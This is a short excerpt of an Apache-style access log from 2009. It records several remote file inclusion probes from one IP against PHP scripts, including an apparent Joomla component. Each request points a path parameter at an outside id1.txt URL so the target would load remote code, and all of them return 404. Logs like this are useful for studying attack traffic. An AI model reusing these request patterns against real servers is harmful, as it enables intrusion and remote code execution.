190.144.44.36 - - [12/Sep/2009:01:30:57 -0400] "GET /logs/access_log.Q109051700%20%20//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:57 -0400] "GET ////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:57 -0400] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:31:02 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:31:02 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:31:02 -0400] "GET /logs/access_log.Q109080700%20%20//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
